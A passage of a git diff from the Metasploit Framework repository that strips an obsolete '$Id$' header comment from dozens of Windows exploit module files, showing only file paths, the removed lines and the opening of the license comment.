a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb +++ b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/iis/ms01_023_printer.rb b/modules/exploits/windows/iis/ms01_023_printer.rb index aa9ed21146..c705c2b672 100644 --- a/modules/exploits/windows/iis/ms01_023_printer.rb +++ b/modules/exploits/windows/iis/ms01_023_printer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/iis/ms01_026_dbldecode.rb b/modules/exploits/windows/iis/ms01_026_dbldecode.rb index 6ddbbd0ed6..27b884a3dc 100644 --- a/modules/exploits/windows/iis/ms01_026_dbldecode.rb +++ b/modules/exploits/windows/iis/ms01_026_dbldecode.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/iis/ms01_033_idq.rb b/modules/exploits/windows/iis/ms01_033_idq.rb index 3c29334c65..0101723deb 100644 --- a/modules/exploits/windows/iis/ms01_033_idq.rb +++ b/modules/exploits/windows/iis/ms01_033_idq.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/iis/ms02_018_htr.rb b/modules/exploits/windows/iis/ms02_018_htr.rb index 19800516e3..10081716d7 100644 --- a/modules/exploits/windows/iis/ms02_018_htr.rb +++ b/modules/exploits/windows/iis/ms02_018_htr.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/iis/ms02_065_msadc.rb b/modules/exploits/windows/iis/ms02_065_msadc.rb index ce315ae0a8..ff7abe1c7b 100644 --- a/modules/exploits/windows/iis/ms02_065_msadc.rb +++ b/modules/exploits/windows/iis/ms02_065_msadc.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb index d9513c33be..ba93456d36 100644 --- a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb +++ b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/imap/eudora_list.rb b/modules/exploits/windows/imap/eudora_list.rb index 56bfec8eb0..9115e83fba 100644 --- a/modules/exploits/windows/imap/eudora_list.rb +++ b/modules/exploits/windows/imap/eudora_list.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/imap/imail_delete.rb b/modules/exploits/windows/imap/imail_delete.rb index def8657029..46a8bced66 100644 --- a/modules/exploits/windows/imap/imail_delete.rb +++ b/modules/exploits/windows/imap/imail_delete.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/imap/ipswitch_search.rb b/modules/exploits/windows/imap/ipswitch_search.rb index 8f1be3158c..9cfbdf6a97 100644 --- a/modules/exploits/windows/imap/ipswitch_search.rb +++ b/modules/exploits/windows/imap/ipswitch_search.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/imap/mailenable_login.rb b/modules/exploits/windows/imap/mailenable_login.rb index 1e60b5556b..a150e7bd09 100644 --- a/modules/exploits/windows/imap/mailenable_login.rb +++ b/modules/exploits/windows/imap/mailenable_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/imap/mailenable_status.rb b/modules/exploits/windows/imap/mailenable_status.rb index 54f589527d..4063215b0a 100644 --- a/modules/exploits/windows/imap/mailenable_status.rb +++ b/modules/exploits/windows/imap/mailenable_status.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/imap/mailenable_w3c_select.rb b/modules/exploits/windows/imap/mailenable_w3c_select.rb index aebf66dd3e..2357a3da12 100644 --- a/modules/exploits/windows/imap/mailenable_w3c_select.rb +++ b/modules/exploits/windows/imap/mailenable_w3c_select.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/imap/mdaemon_cram_md5.rb b/modules/exploits/windows/imap/mdaemon_cram_md5.rb index 848111f031..cdd6013719 100644 --- a/modules/exploits/windows/imap/mdaemon_cram_md5.rb +++ b/modules/exploits/windows/imap/mdaemon_cram_md5.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/imap/mdaemon_fetch.rb b/modules/exploits/windows/imap/mdaemon_fetch.rb index 3999c24baf..e5f6746990 100644 --- a/modules/exploits/windows/imap/mdaemon_fetch.rb +++ b/modules/exploits/windows/imap/mdaemon_fetch.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb index f6c10b6785..1e70cfa290 100644 --- a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb +++ b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/imap/mercur_login.rb b/modules/exploits/windows/imap/mercur_login.rb index 384ac4ba09..67d36aa207 100644 --- a/modules/exploits/windows/imap/mercur_login.rb +++ b/modules/exploits/windows/imap/mercur_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/imap/mercury_login.rb b/modules/exploits/windows/imap/mercury_login.rb index b4cfbb7b15..163eb31c2e 100644 --- a/modules/exploits/windows/imap/mercury_login.rb +++ b/modules/exploits/windows/imap/mercury_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/imap/mercury_rename.rb b/modules/exploits/windows/imap/mercury_rename.rb index e64b0c26e8..49fb6adc9f 100644 --- a/modules/exploits/windows/imap/mercury_rename.rb +++ b/modules/exploits/windows/imap/mercury_rename.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/imap/novell_netmail_append.rb b/modules/exploits/windows/imap/novell_netmail_append.rb index 34619e83b0..31e0eb6dfb 100644 --- a/modules/exploits/windows/imap/novell_netmail_append.rb +++ b/modules/exploits/windows/imap/novell_netmail_append.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/imap/novell_netmail_auth.rb b/modules/exploits/windows/imap/novell_netmail_auth.rb index c9700585cb..62c81596fc 100644 --- a/modules/exploits/windows/imap/novell_netmail_auth.rb +++ b/modules/exploits/windows/imap/novell_netmail_auth.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/imap/novell_netmail_status.rb b/modules/exploits/windows/imap/novell_netmail_status.rb index 3ef77dd8a2..828cd1dc59 100644 --- a/modules/exploits/windows/imap/novell_netmail_status.rb +++ b/modules/exploits/windows/imap/novell_netmail_status.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/imap/novell_netmail_subscribe.rb b/modules/exploits/windows/imap/novell_netmail_subscribe.rb index b43097a777..39a85da1e4 100644 --- a/modules/exploits/windows/imap/novell_netmail_subscribe.rb +++ b/modules/exploits/windows/imap/novell_netmail_subscribe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/isapi/ms00_094_pbserver.rb b/modules/exploits/windows/isapi/ms00_094_pbserver.rb index ca18973f0f..73b514bde3 100644 --- a/modules/exploits/windows/isapi/ms00_094_pbserver.rb +++ b/modules/exploits/windows/isapi/ms00_094_pbserver.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb b/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb index 92c9d5ae71..618a48919f 100644 --- a/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb +++ b/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb b/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb index ca5738ea14..1671bbb06e 100644 --- a/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb +++ b/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb index a8f7bcb6a4..48813d0b73 100644 --- a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb +++ b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/isapi/w3who_query.rb b/modules/exploits/windows/isapi/w3who_query.rb index 8f7c40e291..22208a64f5 100644 --- a/modules/exploits/windows/isapi/w3who_query.rb +++ b/modules/exploits/windows/isapi/w3who_query.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ldap/imail_thc.rb b/modules/exploits/windows/ldap/imail_thc.rb index 1bcf1457da..d965ae8a98 100644 --- a/modules/exploits/windows/ldap/imail_thc.rb +++ b/modules/exploits/windows/ldap/imail_thc.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ldap/pgp_keyserver7.rb b/modules/exploits/windows/ldap/pgp_keyserver7.rb index 3c486922d6..1b3e2f3afd 100644 --- a/modules/exploits/windows/ldap/pgp_keyserver7.rb +++ b/modules/exploits/windows/ldap/pgp_keyserver7.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/license/calicclnt_getconfig.rb b/modules/exploits/windows/license/calicclnt_getconfig.rb index d576b18325..3e1f5ddde8 100644 --- a/modules/exploits/windows/license/calicclnt_getconfig.rb +++ b/modules/exploits/windows/license/calicclnt_getconfig.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/license/calicserv_getconfig.rb b/modules/exploits/windows/license/calicserv_getconfig.rb index 35700fad07..ff66d5bb22 100644 --- a/modules/exploits/windows/license/calicserv_getconfig.rb +++ b/modules/exploits/windows/license/calicserv_getconfig.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/license/sentinel_lm7_udp.rb b/modules/exploits/windows/license/sentinel_lm7_udp.rb index 26ec639635..a03cc24c8d 100644 --- a/modules/exploits/windows/license/sentinel_lm7_udp.rb +++ b/modules/exploits/windows/license/sentinel_lm7_udp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb index 9b6943d801..6dfbd3edef 100644 --- a/modules/exploits/windows/local/ask.rb +++ b/modules/exploits/windows/local/ask.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb index da8d8354f0..80d0c57e2d 100644 --- a/modules/exploits/windows/local/bypassuac.rb +++ b/modules/exploits/windows/local/bypassuac.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/local/current_user_psexec.rb b/modules/exploits/windows/local/current_user_psexec.rb index f0304580e6..5a782a2382 100644 --- a/modules/exploits/windows/local/current_user_psexec.rb +++ b/modules/exploits/windows/local/current_user_psexec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/lotus/domino_http_accept_language.rb b/modules/exploits/windows/lotus/domino_http_accept_language.rb index b6ea1e4ae9..c643d11a54 100644 --- a/modules/exploits/windows/lotus/domino_http_accept_language.rb +++ b/modules/exploits/windows/lotus/domino_http_accept_language.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/lotus/domino_icalendar_organizer.rb b/modules/exploits/windows/lotus/domino_icalendar_organizer.rb index 46aa8f88b4..ebd271ec18 100644 --- a/modules/exploits/windows/lotus/domino_icalendar_organizer.rb +++ b/modules/exploits/windows/lotus/domino_icalendar_organizer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/lotus/domino_sametime_stmux.rb b/modules/exploits/windows/lotus/domino_sametime_stmux.rb index 4a70e0bd7d..99f6fcb10d 100644 --- a/modules/exploits/windows/lotus/domino_sametime_stmux.rb +++ b/modules/exploits/windows/lotus/domino_sametime_stmux.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/lotus/lotusnotes_lzh.rb b/modules/exploits/windows/lotus/lotusnotes_lzh.rb index 91a71e3077..0a4fc9b663 100644 --- a/modules/exploits/windows/lotus/lotusnotes_lzh.rb +++ b/modules/exploits/windows/lotus/lotusnotes_lzh.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/lpd/hummingbird_exceed.rb b/modules/exploits/windows/lpd/hummingbird_exceed.rb index d71bb59b73..8f74437eb7 100644 --- a/modules/exploits/windows/lpd/hummingbird_exceed.rb +++ b/modules/exploits/windows/lpd/hummingbird_exceed.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/lpd/niprint.rb b/modules/exploits/windows/lpd/niprint.rb index f6bb19a3f0..56a2e8a358 100644 --- a/modules/exploits/windows/lpd/niprint.rb +++ b/modules/exploits/windows/lpd/niprint.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/lpd/saplpd.rb b/modules/exploits/windows/lpd/saplpd.rb index c4c138b758..a9d17ed2cc 100644 --- a/modules/exploits/windows/lpd/saplpd.rb +++ b/modules/exploits/windows/lpd/saplpd.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/lpd/wincomlpd_admin.rb b/modules/exploits/windows/lpd/wincomlpd_admin.rb index e93d233c08..d900821c7f 100644 --- a/modules/exploits/windows/lpd/wincomlpd_admin.rb +++ b/modules/exploits/windows/lpd/wincomlpd_admin.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/agentxpp_receive_agentx.rb b/modules/exploits/windows/misc/agentxpp_receive_agentx.rb index d6e31a1c46..fab6efe21c 100644 --- a/modules/exploits/windows/misc/agentxpp_receive_agentx.rb +++ b/modules/exploits/windows/misc/agentxpp_receive_agentx.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb index 45b3c6590d..fa53326a64 100644 --- a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb +++ b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb index f298d4c823..af0bddd24d 100644 --- a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb +++ b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/bakbone_netvault_heap.rb b/modules/exploits/windows/misc/bakbone_netvault_heap.rb index f9b813bbce..ae23ec77aa 100644 --- a/modules/exploits/windows/misc/bakbone_netvault_heap.rb +++ b/modules/exploits/windows/misc/bakbone_netvault_heap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/bcaaa_bof.rb b/modules/exploits/windows/misc/bcaaa_bof.rb index b00342f523..763fee541c 100644 --- a/modules/exploits/windows/misc/bcaaa_bof.rb +++ b/modules/exploits/windows/misc/bcaaa_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/bigant_server.rb b/modules/exploits/windows/misc/bigant_server.rb index 2913d31aad..0daaef40d2 100644 --- a/modules/exploits/windows/misc/bigant_server.rb +++ b/modules/exploits/windows/misc/bigant_server.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/bigant_server_250.rb b/modules/exploits/windows/misc/bigant_server_250.rb index 1c24d01597..07a2c4faf3 100644 --- a/modules/exploits/windows/misc/bigant_server_250.rb +++ b/modules/exploits/windows/misc/bigant_server_250.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/bigant_server_usv.rb b/modules/exploits/windows/misc/bigant_server_usv.rb index 1e75af7e7c..92066c6617 100644 --- a/modules/exploits/windows/misc/bigant_server_usv.rb +++ b/modules/exploits/windows/misc/bigant_server_usv.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/bomberclone_overflow.rb b/modules/exploits/windows/misc/bomberclone_overflow.rb index f86fc9e1fe..d56ceb8b12 100644 --- a/modules/exploits/windows/misc/bomberclone_overflow.rb +++ b/modules/exploits/windows/misc/bomberclone_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/bopup_comm.rb b/modules/exploits/windows/misc/bopup_comm.rb index a5f443ea09..f6702d233c 100644 --- a/modules/exploits/windows/misc/bopup_comm.rb +++ b/modules/exploits/windows/misc/bopup_comm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/borland_interbase.rb b/modules/exploits/windows/misc/borland_interbase.rb index cf797a63ab..33b38a51d1 100644 --- a/modules/exploits/windows/misc/borland_interbase.rb +++ b/modules/exploits/windows/misc/borland_interbase.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/borland_starteam.rb b/modules/exploits/windows/misc/borland_starteam.rb index 8fd941241d..389f7a4eb0 100644 --- a/modules/exploits/windows/misc/borland_starteam.rb +++ b/modules/exploits/windows/misc/borland_starteam.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/citrix_streamprocess.rb b/modules/exploits/windows/misc/citrix_streamprocess.rb index 257406f7a4..884a89f18c 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/doubletake.rb b/modules/exploits/windows/misc/doubletake.rb index a83bf9fb43..ef87c7d57a 100644 --- a/modules/exploits/windows/misc/doubletake.rb +++ b/modules/exploits/windows/misc/doubletake.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/eiqnetworks_esa.rb b/modules/exploits/windows/misc/eiqnetworks_esa.rb index 645b32eb96..559464d1a4 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb index 6984a252be..b01c4233cd 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/eureka_mail_err.rb b/modules/exploits/windows/misc/eureka_mail_err.rb index 3f9780e7c2..8b6f096ae6 100644 --- a/modules/exploits/windows/misc/eureka_mail_err.rb +++ b/modules/exploits/windows/misc/eureka_mail_err.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/fb_isc_attach_database.rb b/modules/exploits/windows/misc/fb_isc_attach_database.rb index 235635ee98..e3a9bd4b27 100644 --- a/modules/exploits/windows/misc/fb_isc_attach_database.rb +++ b/modules/exploits/windows/misc/fb_isc_attach_database.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/fb_isc_create_database.rb b/modules/exploits/windows/misc/fb_isc_create_database.rb index 9df55aaf49..3a3586911e 100644 --- a/modules/exploits/windows/misc/fb_isc_create_database.rb +++ b/modules/exploits/windows/misc/fb_isc_create_database.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/fb_svc_attach.rb b/modules/exploits/windows/misc/fb_svc_attach.rb index a6866bceac..91e9118227 100644 --- a/modules/exploits/windows/misc/fb_svc_attach.rb +++ b/modules/exploits/windows/misc/fb_svc_attach.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/hp_omniinet_1.rb b/modules/exploits/windows/misc/hp_omniinet_1.rb index acaa3e49b4..de20e185de 100644 --- a/modules/exploits/windows/misc/hp_omniinet_1.rb +++ b/modules/exploits/windows/misc/hp_omniinet_1.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/hp_omniinet_2.rb b/modules/exploits/windows/misc/hp_omniinet_2.rb index 406264f02f..5d6417ab9e 100644 --- a/modules/exploits/windows/misc/hp_omniinet_2.rb +++ b/modules/exploits/windows/misc/hp_omniinet_2.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/hp_omniinet_3.rb b/modules/exploits/windows/misc/hp_omniinet_3.rb index eeeca314b6..70301daf6b 100644 --- a/modules/exploits/windows/misc/hp_omniinet_3.rb +++ b/modules/exploits/windows/misc/hp_omniinet_3.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/hp_omniinet_4.rb b/modules/exploits/windows/misc/hp_omniinet_4.rb index b11790327b..d45c2b4120 100644 --- a/modules/exploits/windows/misc/hp_omniinet_4.rb +++ b/modules/exploits/windows/misc/hp_omniinet_4.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/hp_ovtrace.rb b/modules/exploits/windows/misc/hp_ovtrace.rb index 8e683f0265..1d64756e7c 100644 --- a/modules/exploits/windows/misc/hp_ovtrace.rb +++ b/modules/exploits/windows/misc/hp_ovtrace.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/ib_isc_attach_database.rb b/modules/exploits/windows/misc/ib_isc_attach_database.rb index 23eca7f47c..ecc4e697f8 100644 --- a/modules/exploits/windows/misc/ib_isc_attach_database.rb +++ b/modules/exploits/windows/misc/ib_isc_attach_database.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/ib_isc_create_database.rb b/modules/exploits/windows/misc/ib_isc_create_database.rb index 7159055855..4542ffdf6a 100644 --- a/modules/exploits/windows/misc/ib_isc_create_database.rb +++ b/modules/exploits/windows/misc/ib_isc_create_database.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/ib_svc_attach.rb b/modules/exploits/windows/misc/ib_svc_attach.rb index dd7151ba97..09cb484fbe 100644 --- a/modules/exploits/windows/misc/ib_svc_attach.rb +++ b/modules/exploits/windows/misc/ib_svc_attach.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit 